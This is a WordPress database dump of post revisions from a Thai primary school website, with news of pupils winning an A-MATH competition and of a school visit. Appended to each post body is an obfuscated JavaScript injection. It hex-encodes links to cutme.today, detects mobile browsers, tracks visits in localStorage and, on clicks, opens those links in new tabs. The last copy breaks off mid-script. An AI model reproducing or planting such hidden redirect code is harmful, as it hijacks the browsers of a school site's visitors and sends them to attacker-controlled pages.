_0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','การแข่งขัน A-MATH ประจำปี 2567 โรงเรียนอนุบาลวัดพระโต ขอแสดงความยินดีกับนักเรียนคนเก่ง ✨ เด็กหญิงกชพรรณ ชาตรูปไพศาล เด็กหญิงศศินิภา ทองพิทักษ์ ได้รับรางวัลชนะเลิศการแข่งขัน A-MATH ประจาปี 2567 “ฝึกความคิดพิชิตสมอง ท้าประลอง A-MATH” ระดับประถมศึกษาปีที่ 1-6 จัดโดย สำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1','','inherit','closed','closed','','158-revision-v1','','','2024-08-06 13:34:33','2024-08-06 06:34:33','',158,'http://watprato.ssk.in.th/?p=172',0,'revision','',0),
(174,1,'2024-08-06 13:48:27','2024-08-06 06:48:27','<!-- wp:generateblocks/container {\"uniqueId\":\"250207dd\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":171,\"width\":\"780px\",\"height\":\"auto\",\"sizeSlug\":\"large\"} -->\n<figure class=\"wp-block-image size-large is-resized\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/454010015_122167799234202781_6887725117770515048_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-171\" style=\"width:780px;height:auto\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','การแข่งขัน A-MATH ประจำปี 2567 โรงเรียนอนุบาลวัดพระโต ขอแสดงความยินดีกับนักเรียนคนเก่ง ✨ เด็กหญิงกชพรรณ ชาตรูปไพศาล เด็กหญิงศศินิภา ทองพิทักษ์ ได้รับรางวัลชนะเลิศการแข่งขัน A-MATH ประจาปี 2567 “ฝึกความคิดพิชิตสมอง ท้าประลอง A-MATH” ระดับประถมศึกษาปีที่ 1-6 จัดโดย สำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1','','inherit','closed','closed','','158-revision-v1','','','2024-08-06 13:48:27','2024-08-06 06:48:27','',158,'http://watprato.ssk.in.th/?p=174',0,'revision','',0),
(177,1,'2024-08-15 10:47:43','2024-08-15 03:47:43','<!-- wp:paragraph -->\n<p>นายอักษร แสนใหม่ ประธานคณะกรรมการสถานศึกษาฯ พร้อมด้วย นายอนุศักดิ์ พันธ์งาม ผู้อำนวยการเชี่ยวชาญโรงเรียนอนุบาลวัดพระโต รองผู้อำนวยการ คณะครู บุคลากรทางการศึกษา และนักเรียนร่วมต้อนรับ พร้อมทั้งวิทยาลัยเกษตรและเทคโนโลยีศรีสะเกษ ตัวแทนเครือข่ายผู้ปกครอง ชุมชน <a></a>และโรงเรียนเครือข่ายร่วมต้อนรับ และจัดแสดงนิทรรศการชีววิถี</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"c48daaf2\",\"mediaId\":180,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-c48daaf2\"><img class=\"gb-image gb-image-c48daaf2\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/www.karnmuangchumchon.com-1723274955542.jpg\" alt=\"\" title=\"www.karnmuangchumchon.com-1723274955542\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"1674a9fd\",\"mediaId\":182,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-1674a9fd\"><img class=\"gb-image gb-image-1674a9fd\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/www.karnmuangchumchon.com-1723275045574-696x392-2.jpg\" alt=\"\" title=\"www.karnmuangchumchon.com-1723275045574-696x392\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 